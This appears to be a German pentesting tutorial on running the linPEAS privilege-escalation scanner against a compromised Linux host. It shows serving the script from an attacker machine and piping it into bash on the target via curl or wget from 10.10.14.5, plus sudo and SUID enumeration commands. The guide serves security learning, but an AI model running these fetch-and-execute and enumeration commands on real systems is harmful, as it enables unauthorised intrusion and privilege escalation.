Linpeas
linPEAS ist ein automatisches Skript, das ein kompromittiertes Linux-System nach Schwachstellen durchsucht, die für Privilege Escalation genutzt werden können. Es erkennt Probleme wie:
Unsichere Konfigurationen (z. B. Sudo-Berechtigungen).
Interessante Dateien (Passwörter, SSH-Schlüssel).
Schwache Dateiberechtigungen.
Setuid-Programme, Cron-Jobs und mehr.
Wie benutzt man linPEAS?
Hier ist eine einfache Methode, um das Skript auf einem Zielsystem auszuführen:
1. Vorbereitung auf deinem System
Lade linPEAS von GitHub herunter:
$ git clone https://github.com/carlospolop/PEASS-ng.git
Navigiere in den Ordner:
$ cd PEASS-ng/linPEAS
2. Start eines temporären Webservers
Damit das Zielsystem linPEAS herunterladen kann, starte auf deinem Rechner einen Webserver:
$ python3 -m http.server 8080
Hinweis: Dieser Webserver gibt den Inhalt des aktuellen Ordners frei (Port 8080).
3. Ausführen auf dem Zielsystem
Auf dem Zielsystem (z. B. per SSH verbunden) kannst du linPEAS direkt herunterladen und ausführen:
Mit curl
:
$ curl http://<Deine-IP>:8080/linpeas.sh | bash
Mit wget
:
$ wget -q -O - http://<Deine-IP>:8080/linpeas.sh | bash
Beispiel: Wenn deine IP
10.10.14.5
ist, lautet der Befehl:$ curl http://10.10.14.5:8080/linpeas.sh | bash
Farben
LinPEAS verwendet Farben, um zu markieren, wo jeder Abschnitt beginnt. Außerdem werden sie genutzt, um potenzielle Fehlkonfigurationen zu identifizieren.
🟥/🟨 wird verwendet, um Konfigurationen zu kennzeichnen, die sicher (zu 99 %) zu einer Privilegieneskalation (PE) führen können.
🟥 kennzeichnet verdächtige Konfigurationen, die möglicherweise zu einer Privilegieneskalation führen könnten.
🟩 steht für erkannte sichere Konfigurationen (basierend auf dem Namen, nicht auf dem Inhalt!).
🟦 wird verwendet für: Benutzer ohne Shell & eingehängte Geräte.
🩵 (Hell Blau) wird verwendet für: Benutzer mit Shell.
🟪 wird verwendet für: Den aktuellen Benutzernamen.
Typische Schwachstellen, die linPEAS finden kann:
Sudo-Rechte:
Findet Befehle, die ohne Passwort ausgeführt werden können:
$ sudo -l
Interessante Dateien:
Beispielsweise SSH-Schlüssel oder Passwörter in
/etc/passwd
oder/home/
.
Cron-Jobs:
Unsichere Cron-Jobs, die bösartigen Code enthalten könnten.
Setuid-Binaries:
Programme, die mit erhöhten Rechten laufen und möglicherweise ausgenutzt werden können:
$ find / -perm -u=s -type f 2>/dev/null
Zusammenfassung
Webserver starten:
python3 -m http.server 8080
.Auf Zielsystem ausführen:
curl http://<Deine-IP>:8080/linpeas.sh | bash
.Ergebnisse analysieren: Kritische Informationen werden hervorgehoben.
Das war’s! Mit diesen einfachen Schritten kannst du schnell und effizient potenzielle Schwachstellen auf einem Linux-System entdecken.
Last updated